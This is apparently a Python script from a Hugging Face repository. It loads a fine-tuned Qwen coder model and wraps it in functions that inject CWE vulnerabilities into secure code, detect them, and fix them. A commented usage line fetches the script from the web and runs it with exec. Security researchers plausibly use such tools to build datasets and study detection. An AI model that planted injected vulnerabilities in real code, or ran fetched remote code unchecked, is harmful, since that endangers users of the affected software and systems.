File size: 6,425 Bytes
1c74917
 
788e808
1c74917
50cf61f
1c74917
bbca78e
dc3586a
bbca78e
 
 
 
 
50cf61f
1c74917
8a8e78a
 
 
 
bd49c1b
8a8e78a
bbca78e
8a4230c
8a8e78a
bbca78e
 
 
 
 
 
8a4230c
bbca78e
 
 
 
 
 
 
 
 
8a8e78a
 
 
bbca78e
8a8e78a
dc3586a
fa6970c
bbca78e
8a8e78a
 
 
 
 
 
 
 
 
 
 
 
 
 
fa6970c
8a8e78a
 
 
 
 
 
 
 
 
dc3586a
 
 
84b9d97
dc3586a
90e8b93
0a4b368
dc3586a
50cf61f
df3eee1
50cf61f
2195783
ea2db3e
bbca78e
25d4ffa
788e808
 
 
 
 
05957a2
788e808
 
 
 
 
 
 
 
 
dc3586a
788e808
 
 
 
 
 
 
 
 
dc3586a
 
788e808
 
05957a2
938bccc
788e808
 
 
 
be51544
 
788e808
d6b75b0
788e808
 
 
05957a2
788e808
 
 
 
 
 
 
 
d6b75b0
fad23a1
938bccc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
import subprocess
import sys
import json

print("🔥 Installing required packages...")
        
process = subprocess.Popen(
    [sys.executable, "-m", "pip", "install", "-q", "transformers", "retrying", "bitsandbytes", "accelerate", "peft", "torch"],
    stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True
)
for line in process.stdout:
    print(line, end='')
process.wait()
print("🕵️ Packages seems to be fine, now loading model...")
        
import ast
import re
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer, BitsAndBytesConfig
from retrying import retry

bnb_config = BitsAndBytesConfig(load_in_8bit=True)
RunningInCOLAB = 'google.colab' in str(get_ipython()) if hasattr(__builtins__,'__IPYTHON__') else False

# Load tokenizer
_tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2.5-Coder-7B-Instruct")

# Load model with quantization
base_model = AutoModelForCausalLM.from_pretrained(
    "Qwen/Qwen2.5-Coder-7B-Instruct",
    quantization_config=bnb_config if RunningInCOLAB else None,
    device_map="auto",
)

# Load the fine-tuned model
_model = PeftModel.from_pretrained(
    base_model,
    "SushantGautam/vulnerability_ativ0.1",
    device_map="auto",
)

def extract_dict(text):
    match = re.search(r"```python\n(.*?)\n```", text, re.DOTALL)
    return ast.literal_eval(match.group(1)) if match else {}

@retry(stop_max_attempt_number=5)
def generate(prompt, max_new_tokens=4000):
    model, tokenizer = _model, _tokenizer
    messages = [
        {"role": "system", "content": "You are a cybersecurity expert specializing in CWE vulnerabilities in codes. Your responses must be accompanied by a python JSON."},
        {"role": "user", "content": prompt},
    ]
    
    text = tokenizer.apply_chat_template(
        messages,
        tokenize=False,
        add_generation_prompt=True
    )
    
    model_inputs = tokenizer([text], return_tensors="pt").to(model.device)
    generated_ids = model.generate(
        **model_inputs,
        max_new_tokens=max_new_tokens,
    )
    generated_ids = [
        output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
    ]
    
    response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]
    
    try:
        response_formatted = extract_dict(response)
        assert "code" in response_formatted or "vulnerability" in response_formatted
        if "vulnerability" in response_formatted:
            assert isinstance(response_formatted["vulnerability"], list)
    except:
        print('⚠️ Failed to extract dict properly from response. Retrying...')
        raise Exception(f"❌ Failed to extract dict properly from response after five tries: {response}")
    return {"raw": response, "extracted": response_formatted}

print("🎉 Model and tokenizer loaded successfully. Now, making sure the model responses: Ping!")
generate("Return JSON with keys 'code' and 'vulnerability', where 'code' is None and 'vulnerability' is an empty list.")
print('💪🏆🎉 Pong! Model responded successfully. Use generate("<prompt>") to call the model.')

# prompt = "Here's a properly secured code snippet:\n\ndef add_label options, f, attr\n    label_size = options.delete(:label_size) || \"col-md-2\"\n    required_mark = check_required(options, f, attr)\n    label = options[:label] == :none ? '' : options.delete(:label)\n    label ||= ((clazz = f.object.class).respond_to?(:gettext_translation_for_attribute_name) &&\n        s_(clazz.gettext_translation_for_attribute_name attr)) if f\n    label = label.present? ? label_tag(attr, \"#{label}#{required_mark}\", :class => label_size + \" control-label\") : ''\n    label\n  end\n\nYour task is to introduce the mentioned security weaknesses: Create a vulnerable version of this code by adding security risks. Provide the modified script under 'code' and list security issues under 'vulnerability'."

# Use: globals().get("_x") or exec(requests.get("https://huggingface.co/SushantGautam/vulnerability_ativ0.1/raw/main/script.py").text) or globals().__setitem__("_x", "Loaded 🔥")


def vulnerability_injection(secure_code: str, CWE_vulnerability=None):
    if CWE_vulnerability is None:
         ## introduce any vulnerability
         prompt = f"""
            Modify the following secure code to introduce a vulnerability.
            Secure Code:
            {secure_code}
            Your task is to introduce security weaknesses: Create a vulnerable version of this code by adding vulnerabilities.
            Return JSON with keys: '
            code' (modified vulnerable code) and 'vulnerability' (list of CWE vulnerabilities if vulnerabilities introduced else empty).
            """
    else:
     ## introduce specific vulnerability
        prompt = f"""
            Modify the following secure code to introduce a {CWE_vulnerability} vulnerability.

            Secure Code:
            {secure_code}

            Your task is to introduce the mentioned security weaknesses: Create a vulnerable version of this code by adding security risks. 
            Return JSON with keys: 'code' (modified vulnerable code) and 'vulnerability' (list of CWE if vulnerabilities introduced else empty).

            """
    return generate(prompt)    


def vulnerability_detection(input_code: str):
    prompt = f"""
        Analyze the following code and detect if any CWE security vulnerabilities are already present.

        Code:
        {input_code}

        Identify potential vulnerabilities that already exist in the code.
        Return JSON with key: 'vulnerability' (list of detected CWE vulnerabilities or an empty list [] if no  vulnerability found).
        """
    return generate(prompt)


def vulnerability_fix(insecure_code: str):
    prompt = f"""
        Fix the security vulnerabilities in the following code.

        Vulnerable Code:
        {insecure_code}

        Your task is to fix the security vulnerabilities in the code.
        Return JSON with keys: 'code' (secure version) and 'vulnerability' (list of fixed CWE vulnerabilities if any else empty list).
        """
    return generate(prompt)

print('ƒ Four functions are available to use:\n🧩vulnerability_injection(secure_code: str)\n🧩vulnerability_injection(secure_code: str, CWE_vulnerability=["CWE-89"])\n🧩vulnerability_detection(input_code: str)\n🧩vulnerability_fix(insecure_code: str)')